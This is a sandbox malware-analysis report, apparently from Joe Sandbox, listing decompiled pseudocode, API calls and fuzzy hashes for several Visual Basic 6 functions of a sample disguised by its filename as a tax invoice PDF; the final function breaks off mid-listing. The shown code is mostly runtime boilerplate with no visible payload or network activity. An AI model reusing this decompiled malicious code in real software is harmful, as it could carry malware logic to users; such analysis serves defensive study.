__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 00417918
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417945
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041797A
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041798B
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041799C
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117B8,000001CC,?,?,00000000), ref: 004179DD
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 004179EE
__vbaFreeStr.MSVBVM60(00417A1F,?,?,00000000), ref: 00417A19

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Chkstk$Free$CheckHresultNew2$CopyList
String ID:
API String ID: 3169856408-0
Opcode ID: 4b88bf8c819657d367f9cc451494df4e558ced532fc34eb34ae1c21d342094b0
Instruction ID: 738dc2b83495bf08f527d4e1fe31517518e413a1cea6f10885a99618838cbada
Opcode Fuzzy Hash: 4b88bf8c819657d367f9cc451494df4e558ced532fc34eb34ae1c21d342094b0
Instruction Fuzzy Hash: 5171FC71D00208DFDB10DFD0C849BDEBBB9BF09714F20492AE501BB2A1C7B95985DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00417E07, Relevance: 28.7, APIs: 19, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00417E07(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				void* _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr _v68;
				intOrPtr* _v72;
				signed int _v76;
				intOrPtr* _v80;
				signed int _v84;
				intOrPtr* _v88;
				signed int _v92;
				signed int _v96;
				char* _t87;
				signed int _t90;
				char* _t94;
				signed int _t97;
				signed int _t103;
				signed int _t108;
				signed int _t109;
				intOrPtr _t134;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t134;
				_push(0x4c);
				L004014B0();
				_v12 = _t134;
				_v8 = 0x4013e0;
				L00401684();
				L00401684();
				if( *0x41a010 != 0) {
					_v72 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v72 = 0x41a010;
				}
				_t87 =  &_v44;
				L0040169C();
				_v48 = _t87;
				_t90 =  *((intOrPtr*)( *_v48 + 0x194))(_v48, _t87,  *((intOrPtr*)( *((intOrPtr*)( *_v72)) + 0x300))( *_v72));
				asm("fclex");
				_v52 = _t90;
				if(_v52 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x194);
					_push(0x411a50);
					_push(_v48);
					_push(_v52);
					L00401690();
					_v76 = _t90;
				}
				L0040168A();
				if( *0x41a010 != 0) {
					_v80 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v80 = 0x41a010;
				}
				_t94 =  &_v44;
				L0040169C();
				_v48 = _t94;
				_t97 =  *((intOrPtr*)( *_v48 + 0x1d8))(_v48, _t94,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x348))( *_v80));
				asm("fclex");
				_v52 = _t97;
				if(_v52 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x1d8);
					_push(0x411730);
					_push(_v48);
					_push(_v52);
					L00401690();
					_v84 = _t97;
				}
				L0040168A();
				if( *0x41a31c != 0) {
					_v88 = 0x41a31c;
				} else {
					_push(0x41a31c);
					_push(0x411788);
					L00401696();
					_v88 = 0x41a31c;
				}
				_v48 =  *_v88;
				_t103 =  *((intOrPtr*)( *_v48 + 0x14))(_v48,  &_v44);
				asm("fclex");
				_v52 = _t103;
				if(_v52 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x411778);
					_push(_v48);
					_push(_v52);
					L00401690();
					_v92 = _t103;
				}
				_v56 = _v44;
				_t108 =  *((intOrPtr*)( *_v56 + 0x130))(_v56,  &_v40);
				asm("fclex");
				_v60 = _t108;
				if(_v60 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x411900);
					_push(_v56);
					_push(_v60);
					L00401690();
					_v96 = _t108;
				}
				_t109 = _v40;
				_v68 = _t109;
				_v40 = _v40 & 0x00000000;
				L00401648();
				L0040168A();
				_v28 =  *0x4013d8;
				asm("wait");
				_push(0x418056);
				L0040165A();
				L0040165A();
				L0040165A();
				return _t109;
			}

0x00417e0c
0x00417e17
0x00417e18
0x00417e1f
0x00417e22
0x00417e2a
0x00417e2d
0x00417e3a
0x00417e45
0x00417e51
0x00417e6b
0x00417e53
0x00417e53
0x00417e58
0x00417e5d
0x00417e62
0x00417e62
0x00417e86
0x00417e8a
0x00417e8f
0x00417e9a
0x00417ea0
0x00417ea2
0x00417ea9
0x00417ec5
0x00417eab
0x00417eab
0x00417eb0
0x00417eb5
0x00417eb8
0x00417ebb
0x00417ec0
0x00417ec0
0x00417ecc
0x00417ed8
0x00417ef2
0x00417eda
0x00417eda
0x00417edf
0x00417ee4
0x00417ee9
0x00417ee9
0x00417f0d
0x00417f11
0x00417f16
0x00417f21
0x00417f27
0x00417f29
0x00417f30
0x00417f4c
0x00417f32
0x00417f32
0x00417f37
0x00417f3c
0x00417f3f
0x00417f42
0x00417f47
0x00417f47
0x00417f53
0x00417f5f
0x00417f79
0x00417f61
0x00417f61
0x00417f66
0x00417f6b
0x00417f70
0x00417f70
0x00417f85
0x00417f94
0x00417f97
0x00417f99
0x00417fa0
0x00417fb9
0x00417fa2
0x00417fa2
0x00417fa4
0x00417fa9
0x00417fac
0x00417faf
0x00417fb4
0x00417fb4
0x00417fc0
0x00417fcf
0x00417fd5
0x00417fd7
0x00417fde
0x00417ffa
0x00417fe0
0x00417fe0
0x00417fe5
0x00417fea
0x00417fed
0x00417ff0
0x00417ff5
0x00417ff5
0x00417ffe
0x00418001
0x00418004
0x0041800e
0x00418016
0x00418021
0x00418024
0x00418025
0x00418040
0x00418048
0x00418050
0x00418055

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00417E22
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 00417E3A
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 00417E45
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 00417E5D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417E8A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411A50,00000194), ref: 00417EBB
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 00417ECC
__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 00417EE4
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417F11
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411730,000001D8), ref: 00417F42
__vbaFreeObj.MSVBVM60 ref: 00417F53
__vbaNew2.MSVBVM60(00411788,0041A31C), ref: 00417F6B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411778,00000014), ref: 00417FAF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411900,00000130), ref: 00417FF0
__vbaStrMove.MSVBVM60 ref: 0041800E
__vbaFreeObj.MSVBVM60 ref: 00418016
__vbaFreeStr.MSVBVM60(00418056), ref: 00418040
__vbaFreeStr.MSVBVM60(00418056), ref: 00418048
__vbaFreeStr.MSVBVM60(00418056), ref: 00418050

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$CheckHresult$New2$Copy$ChkstkMove
String ID:
API String ID: 1233010552-0
Opcode ID: a47f36fe6c2b0b0392f22cf102372c15f00925ac0e275275d0e16e63ed524ec5
Instruction ID: ad02b27ba5c0c68c66390221b98b7c2ec1fa10049a1c23b685ef14a2d3a1987b
Opcode Fuzzy Hash: a47f36fe6c2b0b0392f22cf102372c15f00925ac0e275275d0e16e63ed524ec5
Instruction Fuzzy Hash: 0271D471900208EFCB00DFE5C889BEDBBB4BF08315F24446AE511B72A1D7796985DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00416782, Relevance: 28.6, APIs: 19, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00416782(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a16, void* _a24, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v60;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr* _v76;
				signed int _v80;
				char* _t39;
				char* _t43;
				signed int _t47;
				char* _t49;
				intOrPtr _t73;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_t39 = 0x3c;
				L004014B0();
				_v12 = _t73;
				_v8 = 0x401328;
				L00401684();
				L00401684();
				L00401684();
				asm("fldz");
				L00401516();
				L004015E2();
				asm("fcomp qword [0x401320]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					if( *0x41a010 != 0) {
						_v76 = 0x41a010;
					} else {
						_push(0x41a010);
						_push(0x411d38);
						L00401696();
						_v76 = 0x41a010;
					}
					_t43 =  &_v40;
					L0040169C();
					_v64 = _t43;
					_t47 =  *((intOrPtr*)( *_v64 + 0x148))(_v64,  &_v44, _t43,  *((intOrPtr*)( *((intOrPtr*)( *_v76)) + 0x378))( *_v76));
					asm("fclex");
					_v68 = _t47;
					if(_v68 >= 0) {
						_t25 =  &_v80;
						 *_t25 = _v80 & 0x00000000;
						__eflags =  *_t25;
					} else {
						_push(0x148);
						_push(0x4117b8);
						_push(_v64);
						_push(_v68);
						L00401690();
						_v80 = _t47;
					}
					_push(0);
					_push(0);
					_push(_v44);
					_push( &_v60);
					L00401618();
					_push(1);
					_t49 =  &_v60;
					_push(_t49);
					L004015A6();
					L00401648();
					_push(_t49);
					L004015AC();
					L0040165A();
					_push( &_v44);
					_t39 =  &_v40;
					_push(_t39);
					_push(2);
					L00401654();
					L00401636();
				}
				asm("wait");
				_push(0x416902);
				L0040165A();
				L0040165A();
				L0040165A();
				return _t39;
			}

0x00416787
0x00416792
0x00416793
0x0041679c
0x0041679d
0x004167a5
0x004167a8
0x004167b5
0x004167c0
0x004167cb
0x004167d0
0x004167d2
0x004167d7
0x004167dc
0x004167e2
0x004167e4
0x004167e5
0x004167f2
0x0041680c
0x004167f4
0x004167f4
0x004167f9
0x004167fe
0x00416803
0x00416803
0x00416827
0x0041682b
0x00416830
0x0041683f
0x00416845
0x00416847
0x0041684e
0x0041686a
0x0041686a
0x0041686a
0x00416850
0x00416850
0x00416855
0x0041685a
0x0041685d
0x00416860
0x00416865
0x00416865
0x0041686e
0x00416870
0x00416872
0x00416878
0x00416879
0x00416881
0x00416883
0x00416886
0x00416887
0x00416891
0x00416896
0x00416897
0x0041689f
0x004168a7
0x004168a8
0x004168ab
0x004168ac
0x004168ae
0x004168b9
0x004168b9
0x004168be
0x004168bf
0x004168ec
0x004168f4
0x004168fc
0x00416901

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 0041679D
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 004167B5
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 004167C0
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 004167CB
_CIcos.MSVBVM60(?,?,?,?,004014B6), ref: 004167D2
__vbaFpR8.MSVBVM60(?,?,?,?,004014B6), ref: 004167D7
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 004167FE
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041682B
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117B8,00000148), ref: 00416860
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00416879
__vbaStrVarMove.MSVBVM60(?,00000001), ref: 00416887
__vbaStrMove.MSVBVM60(?,00000001), ref: 00416891
#580.MSVBVM60(00000000,?,00000001), ref: 00416897
__vbaFreeStr.MSVBVM60(00000000,?,00000001), ref: 0041689F
__vbaFreeObjList.MSVBVM60(00000002,?,?,00000000,?,00000001), ref: 004168AE
__vbaFreeVar.MSVBVM60(00000000,?,00000001), ref: 004168B9
__vbaFreeStr.MSVBVM60(00416902,?,?,?,?,004014B6), ref: 004168EC
__vbaFreeStr.MSVBVM60(00416902,?,?,?,?,004014B6), ref: 004168F4
__vbaFreeStr.MSVBVM60(00416902,?,?,?,?,004014B6), ref: 004168FC

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$Copy$Move$#580CallCheckChkstkHresultIcosLateListNew2
String ID:
API String ID: 29270831-0
Opcode ID: 853d8788e7ac688aa2c1538bd2a1a407962ad3bdd47b44c34fbd21a938c9b220
Instruction ID: 6ec303965b021cb285dab3858eed4d72cb4a1c1a162cc50a9d87d0d76c57f15c
Opcode Fuzzy Hash: 853d8788e7ac688aa2c1538bd2a1a407962ad3bdd47b44c34fbd21a938c9b220
Instruction Fuzzy Hash: D9412971900209ABCB10EF91CC46FEEBBB8AF14308F14492AF501B71E1DB79A945CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004155D9, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E004155D9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr* _v72;
				signed int _v76;
				intOrPtr* _v80;
				signed int _v84;
				char* _t60;
				signed int _t64;
				char* _t68;
				signed int _t71;
				void* _t91;
				void* _t93;
				intOrPtr _t94;

				_t94 = _t93 - 0xc;
				 *[fs:0x0] = _t94;
				L004014B0();
				_v16 = _t94;
				_v12 = 0x401288;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x4014b6, _t91);
				L00401684();
				L00401684();
				if( *0x41a010 != 0) {
					_v72 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v72 = 0x41a010;
				}
				_t60 =  &_v36;
				L0040169C();
				_v56 = _t60;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t64 =  *((intOrPtr*)( *_v56 + 0x1ec))(_v56, L"NEAPOLITANERNE", 0x10, _t60,  *((intOrPtr*)( *((intOrPtr*)( *_v72)) + 0x384))( *_v72));
				asm("fclex");
				_v60 = _t64;
				if(_v60 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x1ec);
					_push(0x4117fc);
					_push(_v56);
					_push(_v60);
					L00401690();
					_v76 = _t64;
				}
				L0040168A();
				if( *0x41a010 != 0) {
					_v80 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v80 = 0x41a010;
				}
				_t68 =  &_v36;
				L0040169C();
				_v56 = _t68;
				_t71 =  *((intOrPtr*)( *_v56 + 0x138))(_v56, _t68,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x35c))( *_v80));
				asm("fclex");
				_v60 = _t71;
				if(_v60 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x138);
					_push(0x4118b4);
					_push(_v56);
					_push(_v60);
					L00401690();
					_v84 = _t71;
				}
				L0040168A();
				_push(0x415782);
				L0040165A();
				L0040165A();
				return _t71;
			}

0x004155dc
0x004155eb
0x004155f5
0x004155fd
0x00415600
0x00415607
0x00415616
0x0041561f
0x0041562a
0x00415636
0x00415650
0x00415638
0x00415638
0x0041563d
0x00415642
0x00415647
0x00415647
0x0041566b
0x0041566f
0x00415674
0x00415677
0x0041567e
0x00415688
0x00415692
0x00415693
0x00415694
0x00415695
0x004156a3
0x004156a9
0x004156ab
0x004156b2
0x004156ce
0x004156b4
0x004156b4
0x004156b9
0x004156be
0x004156c1
0x004156c4
0x004156c9
0x004156c9
0x004156d5
0x004156e1
0x004156fb
0x004156e3
0x004156e3
0x004156e8
0x004156ed
0x004156f2
0x004156f2
0x00415716
0x0041571a
0x0041571f
0x0041572a
0x00415730
0x00415732
0x00415739
0x00415755
0x0041573b
0x0041573b
0x00415740
0x00415745
0x00415748
0x0041574b
0x00415750
0x00415750
0x0041575c
0x00415761
0x00415774
0x0041577c
0x00415781

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 004155F5
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 0041561F
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 0041562A
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 00415642
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041566F
__vbaChkstk.MSVBVM60(?,00000000), ref: 00415688
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117FC,000001EC), ref: 004156C4
__vbaFreeObj.MSVBVM60 ref: 004156D5
__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 004156ED
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041571A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004118B4,00000138), ref: 0041574B
__vbaFreeObj.MSVBVM60 ref: 0041575C
__vbaFreeStr.MSVBVM60(00415782), ref: 00415774
__vbaFreeStr.MSVBVM60(00415782), ref: 0041577C

Strings

NEAPOLITANERNE, xrefs: 00415696

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$CheckChkstkCopyHresultNew2
String ID: NEAPOLITANERNE
API String ID: 2810356740-375774541
Opcode ID: e9db004b50577f0e7961fd50455e9d349543f4abf48268d49a48e74da501f719
Instruction ID: 6daf6b2d8973dc82d9dc3a138b07a252ee2b307ff7e844bd52223dd1b7505da0
Opcode Fuzzy Hash: e9db004b50577f0e7961fd50455e9d349543f4abf48268d49a48e74da501f719
Instruction Fuzzy Hash: F7512C70901608EFCB00EF90D88ABDDBBB5BF08314F20482AF501BB2A1CB795985DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00414BA8, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00414BA8(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				void* _v28;
				short _v32;
				long long _v40;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				intOrPtr _v112;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				char* _v160;
				intOrPtr _v168;
				intOrPtr _v176;
				char _v184;
				short _v268;
				short _t81;
				char* _t84;
				void* _t109;
				void* _t111;
				long long* _t112;
				long long _t117;

				_t112 = _t111 - 0xc;
				 *[fs:0x0] = _t112;
				L004014B0();
				_v16 = _t112;
				_v12 = 0x401208;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4014b6, _t109);
				_v80 = 0x80020004;
				_v88 = 0xa;
				_v64 = 0x80020004;
				_v72 = 0xa;
				_v48 = 0x80020004;
				_v56 = 0xa;
				_push( &_v88);
				_push( &_v72);
				_push( &_v56);
				_t117 =  *0x401200;
				 *_t112 = _t117;
				asm("fld1");
				 *_t112 = _t117;
				asm("fld1");
				 *_t112 = _t117;
				L00401606();
				_v40 = _t117;
				_push( &_v88);
				_push( &_v72);
				_push( &_v56);
				_push(3);
				L00401666();
				_v160 = 0x411830;
				_v168 = 8;
				L004015FA();
				_push(0);
				_push(3);
				_push( &_v56);
				_push( &_v72);
				L00401600();
				_v176 = 0x411838;
				_v184 = 0x8008;
				_push( &_v72);
				_t81 =  &_v184;
				_push(_t81);
				L00401678();
				_v268 = _t81;
				_push( &_v72);
				_push( &_v56);
				_push(2);
				L00401666();
				_t84 = _v268;
				if(_t84 != 0) {
					_v144 = 0x80020004;
					_v152 = 0xa;
					_v128 = 0x80020004;
					_v136 = 0xa;
					_v112 = 0x80020004;
					_v120 = 0xa;
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					_v64 = 0x80020004;
					_v72 = 0xa;
					_v160 = L"BOLIGMINISTERKOLLEGAERNE";
					_v168 = 8;
					L004015FA();
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push( &_v56);
					L004015F4();
					L00401648();
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_t84 =  &_v56;
					_push(_t84);
					_push(7);
					L00401666();
				}
				_v32 = 0x6890;
				asm("wait");
				_push(0x414df6);
				L0040165A();
				return _t84;
			}

0x00414bab
0x00414bba
0x00414bc6
0x00414bce
0x00414bd1
0x00414bd8
0x00414be7
0x00414bea
0x00414bf1
0x00414bf8
0x00414bff
0x00414c06
0x00414c0d
0x00414c17
0x00414c1b
0x00414c1f
0x00414c20
0x00414c28
0x00414c2b
0x00414c2f
0x00414c32
0x00414c36
0x00414c39
0x00414c3e
0x00414c44
0x00414c48
0x00414c4c
0x00414c4d
0x00414c4f
0x00414c57
0x00414c61
0x00414c74
0x00414c79
0x00414c7b
0x00414c80
0x00414c84
0x00414c85
0x00414c8a
0x00414c94
0x00414ca1
0x00414ca2
0x00414ca8
0x00414ca9
0x00414cae
0x00414cb8
0x00414cbc
0x00414cbd
0x00414cbf
0x00414cc7
0x00414cd0
0x00414cd6
0x00414ce0
0x00414cea
0x00414cf1
0x00414cfb
0x00414d02
0x00414d09
0x00414d10
0x00414d17
0x00414d1e
0x00414d25
0x00414d2c
0x00414d33
0x00414d3d
0x00414d50
0x00414d5b
0x00414d62
0x00414d66
0x00414d6a
0x00414d6e
0x00414d72
0x00414d76
0x00414d77
0x00414d81
0x00414d8c
0x00414d93
0x00414d97
0x00414d9b
0x00414d9f
0x00414da3
0x00414da4
0x00414da7
0x00414da8
0x00414daa
0x00414daf
0x00414db2
0x00414db8
0x00414db9
0x00414df0
0x00414df5

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00414BC6
#680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00414C39
__vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00414C4F
__vbaVarDup.MSVBVM60 ref: 00414C74
#717.MSVBVM60(?,?,00000003,00000000), ref: 00414C85
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,00000003,00000000), ref: 00414CA9
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,00000003,00000000), ref: 00414CBF
__vbaVarDup.MSVBVM60 ref: 00414D50
#596.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 00414D77
__vbaStrMove.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 00414D81
__vbaFreeVarList.MSVBVM60(00000007,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 00414DAA
__vbaFreeStr.MSVBVM60(00414DF6), ref: 00414DF0

Strings

BOLIGMINISTERKOLLEGAERNE, xrefs: 00414D33

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$List$#596#680#717ChkstkMove
String ID: BOLIGMINISTERKOLLEGAERNE
API String ID: 643183441-2320582082
Opcode ID: 0a5f2c37e7083968f649327d4d9169f49ea5d2c1acc66739cfe8806285cad805
Instruction ID: 2ae093f7f8d0c5b6d64fa1832155be6b618416101cde4bf940b2a1d179e6bc22
Opcode Fuzzy Hash: 0a5f2c37e7083968f649327d4d9169f49ea5d2c1acc66739cfe8806285cad805
Instruction Fuzzy Hash: 1A5106B290020CABDB11DFD1DA85BDEB7BCEF04304F10816AE205AA151DB796B49CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00417A32, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00417A32(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				char _v28;
				char _v44;
				char* _v52;
				intOrPtr _v60;
				char _v64;
				void* _v68;
				signed int _v72;
				intOrPtr* _v80;
				signed int _v84;
				intOrPtr* _v88;
				signed int _v92;
				char* _t54;
				signed int _t55;
				char* _t59;
				signed int _t62;
				char* _t66;
				intOrPtr _t90;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t90;
				_push(0x48);
				L004014B0();
				_v12 = _t90;
				_v8 = 0x4013b0;
				_v52 = L"4-4-4";
				_v60 = 8;
				L004015FA();
				_t54 =  &_v44;
				_push(_t54);
				L00401576();
				_v68 =  ~(0 | _t54 != 0x0000ffff);
				L00401636();
				_t55 = _v68;
				if(_t55 == 0) {
					if( *0x41a010 != 0) {
						_v80 = 0x41a010;
					} else {
						_push(0x41a010);
						_push(0x411d38);
						L00401696();
						_v80 = 0x41a010;
					}
					_t59 =  &_v28;
					L0040169C();
					_v68 = _t59;
					_t62 =  *((intOrPtr*)( *_v68 + 0x180))(_v68, _t59,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x308))( *_v80));
					asm("fclex");
					_v72 = _t62;
					if(_v72 >= 0) {
						_v84 = _v84 & 0x00000000;
					} else {
						_push(0x180);
						_push(0x4117c8);
						_push(_v68);
						_push(_v72);
						L00401690();
						_v84 = _t62;
					}
					L0040168A();
					if( *0x41a010 != 0) {
						_v88 = 0x41a010;
					} else {
						_push(0x41a010);
						_push(0x411d38);
						L00401696();
						_v88 = 0x41a010;
					}
					_t66 =  &_v28;
					L0040169C();
					_v68 = _t66;
					_t55 =  *((intOrPtr*)( *_v68 + 0x78))(_v68,  &_v64, _t66,  *((intOrPtr*)( *((intOrPtr*)( *_v88)) + 0x394))( *_v88));
					asm("fclex");
					_v72 = _t55;
					if(_v72 >= 0) {
						_v92 = _v92 & 0x00000000;
					} else {
						_push(0x78);
						_push(0x4119c4);
						_push(_v68);
						_push(_v72);
						L00401690();
						_v92 = _t55;
					}
					_v24 = _v64;
					L0040168A();
				}
				asm("wait");
				_push(0x417bd1);
				return _t55;
			}

0x00417a37
0x00417a42
0x00417a43
0x00417a4a
0x00417a4d
0x00417a55
0x00417a58
0x00417a5f
0x00417a66
0x00417a73
0x00417a78
0x00417a7b
0x00417a7c
0x00417a8c
0x00417a93
0x00417a98
0x00417a9e
0x00417aac
0x00417ac6
0x00417aae
0x00417aae
0x00417ab3
0x00417ab8
0x00417abd
0x00417abd
0x00417ae1
0x00417ae5
0x00417aea
0x00417af5
0x00417afb
0x00417afd
0x00417b04
0x00417b20
0x00417b06
0x00417b06
0x00417b0b
0x00417b10
0x00417b13
0x00417b16
0x00417b1b
0x00417b1b
0x00417b27
0x00417b33
0x00417b4d
0x00417b35
0x00417b35
